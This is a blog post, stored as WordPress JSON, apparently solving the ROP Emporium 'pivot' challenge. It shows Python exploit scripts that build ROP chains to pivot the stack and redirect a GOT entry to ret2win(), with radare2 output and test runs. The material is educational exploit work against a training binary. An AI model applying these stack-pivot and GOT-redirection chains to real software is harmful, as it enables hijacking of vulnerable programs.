{"id":1099,"date":"2019-12-11T11:47:22","date_gmt":"2019-12-11T16:47:22","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=1099"},"modified":"2019-12-11T11:48:16","modified_gmt":"2019-12-11T16:48:16","slug":"rop-emporium-pivot-solution","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/rop-emporium-pivot-solution\/","title":{"rendered":"ROP Emporium | pivot Solution"},"content":{"rendered":"

There’s only enough space for a three-link chain on the stack but you’ve been given space to stash a much larger ROP chain elsewhere. Learn how to pivot the stack onto a new location.<\/p>\n

The binary and challenge description can be found here:
\nhttps:\/\/ropemporium.com\/challenge\/pivot.html<\/a><\/p>\n

In this challenge, we’re actually pivoting twice. Once because our ROP chain runs out of space, and again to access an unused function in a shared library.<\/p>\n

First, I’ll make sure ASLR is disabled (because we haven’t learned how to bypass that yet) and test run the binary:<\/p>\n

\r\nandrew ~\/pivot $ echo 0 | sudo tee \/proc\/sys\/kernel\/randomize_va_space\r\n0\r\n\r\nandrew ~\/pivot $ .\/pivot \r\npivot by ROP Emporium\r\n64bits\r\n\r\nCall ret2win() from libpivot.so\r\nThe Old Gods kindly bestow upon you a place to pivot: 0x7ffff7bdaf10\r\nSend your second chain now and it will land there\r\n> test\r\nNow kindly send your stack smash\r\n> testing\r\n\r\nExiting\r\n<\/pre>\n
How nice of them to give the address of where we’ll be pivoting to. The challenge description states, “To ‘stack pivot’ just means to move the stack pointer elsewhere.” So let’s look for gadgets that might help with that:<\/p>\n
\"\"<\/p>\n
There’s 4 gadgets here, only 2 of which we’ll need now; the first two. I can pop a value into RAX, then “xchg” that with RSP. The next link in our chain will then be at whatever address we popped into RAX. I’ll write a short Python script to test this out. It’ll simply pivot to the new address and execute the foothold_function()<\/span>.<\/p>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nimport sys\r\n\r\nbuf1  = b"A" * 40\r\nbuf1 += (0x400b00).to_bytes(8, "little")       # pop rax; ret;\r\nbuf1 += (0x7ffff7bdaf10).to_bytes(8, "little") # place to pivot to\r\nbuf1 += (0x400b02).to_bytes(8, "little")       # xchg rax, rsp; ret\r\n\r\nbuf2  = (0x400850).to_bytes(8, "little")       # foothold_function()\r\nbuf2 += b"\\n"\r\n\r\nsys.stdout.buffer.write(buf2)\r\nsys.stdout.buffer.write(buf1)\r\n<\/pre>\n
Testing it out:<\/p>\n
\r\nandrew ~\/pivot $ .\/exploit.py | .\/pivot \r\npivot by ROP Emporium\r\n64bits\r\n\r\nCall ret2win() from libpivot.so\r\nThe Old Gods kindly bestow upon you a place to pivot: 0x7ffff7bdaf10\r\nSend your second chain now and it will land there\r\n> Now kindly send your stack smash\r\n> foothold_function(), check out my .got.plt entry to gain a foothold into libpivot.soSegmentation fault (core dumped)\r\n<\/pre>\n
Once foothold_function() <\/span>has been called, it’s GOT entry will be updated to point directly to it’s code, instead of back to the PLT. I can take that address, modify it to point to ret2win() <\/span>instead, and redirect execution to that point. Looking at the usefulGadgets<\/code> again, I see that \"mov rax, qword [rax]\"<\/code> and \"add rax, rbp\"<\/code> can be used. Before I can use those, however, I’ll need to find a \"pop rax\"<\/code> gadget to get the GOT address loaded into RAX. After those, I’ll need to be able to call whatever value is in RAX:<\/p>\n
\"\"<\/p>\n
Now, let’s look at libpivot.so<\/code> and figure out the offset between the two functions:<\/p>\n
\r\nandrew ~\/pivot $ r2 libpivot.so \r\n\r\n[0x00000870]> aa\r\n[Cannot analyze at 0x00000860g with sym. and entry0 (aa)\r\nCannot analyze at 0x00000868\r\n[x] Analyze all flags starting with sym. and entry0 (aa)\r\n\r\n[0x00000870]> f~ret\r\n0x00000abe 26 sym.ret2win\r\n\r\n[0x00000870]> f~foot\r\n0x00000970 24 sym.foothold_function\r\n0x00000ae8 85 str.foothold_function____check_out_my_.got.plt_entry_to_gain_a_foothold_into_libpivot.so\r\n\r\n[0x00000870]> ? sym.ret2win - sym.foothold_function\r\nint32   334\r\nuint32  334\r\nhex     0x14e\r\noctal   0516\r\nunit    334\r\nsegment 0000:014e\r\nstring  "N\\x01"\r\nfvalue: 334.0\r\nfloat:  0.000000f\r\ndouble: 0.000000\r\nbinary  0b0000000101001110\r\ntrits   0t110101\r\n<\/pre>\n
I’ll need to add 334 bytes to the foothold_function() <\/span>address in GOT. I can put this all together and expand on the exploit script from earlier:<\/p>\n
\r\n!\/usr\/bin\/env python3\r\n\r\nimport sys\r\n\r\nbuf1  = b"A" * 40\r\nbuf1 += (0x400b00).to_bytes(8, "little") # pop rax; ret;\r\nbuf1 += (0x7ffff7bdaf10).to_bytes(8, "little") # place to pivot to\r\nbuf1 += (0x400b02).to_bytes(8, "little") # xchg rax, rsp; ret\r\n\r\nbuf2  = (0x400850).to_bytes(8, "little") # PLT address of foothold_function()\r\nbuf2 += (0x400b00).to_bytes(8, "little") # pop rax; ret;\r\nbuf2 += (0x602048).to_bytes(8, "little") # GOT address of foothold_function()\r\nbuf2 += (0x400b05).to_bytes(8, "little") # mov rax, qword [rax]; ret\r\nbuf2 += (0x400900).to_bytes(8, "little") # pop rbp; ret\r\nbuf2 += (334).to_bytes(8, "little")\r\nbuf2 += (0x400b09).to_bytes(8, "little") # add rax, rbp; ret\r\nbuf2 += (0x40098e).to_bytes(8, "little") # call rax\r\nbuf2 += b"\\n"\r\n\r\nsys.stdout.buffer.write(buf2)\r\nsys.stdout.buffer.write(buf1)\r\n<\/pre>\n
Testing it out:<\/p>\n
\r\nandrew ~\/pivot $ .\/exploit.py | .\/pivot \r\npivot by ROP Emporium\r\n64bits\r\n\r\nCall ret2win() from libpivot.so\r\nThe Old Gods kindly bestow upon you a place to pivot: 0x7ffff7bdaf10\r\nSend your second chain now and it will land there\r\n> Now kindly send your stack smash\r\n> foothold_function(), check out my .got.plt entry to gain a foothold into libpivot.soROPE{a_placeholder_32byte_flag!}\r\n<\/pre>\n
It’s not pretty since there’s no newline before the start of the flag, but it works!<\/p>\n","protected":false},"excerpt":{"rendered":"
There’s only enough space for a three-link chain on the stack but you’ve been given space to stash a much larger ROP chain elsewhere. Learn how to pivot the stack onto a new location … Continue readingROP Emporium | pivot Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-1099","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/1099","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=1099"}],"version-history":[{"count":13,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/1099\/revisions"}],"predecessor-version":[{"id":1117,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/1099\/revisions\/1117"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=1099"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=1099"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=1099"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}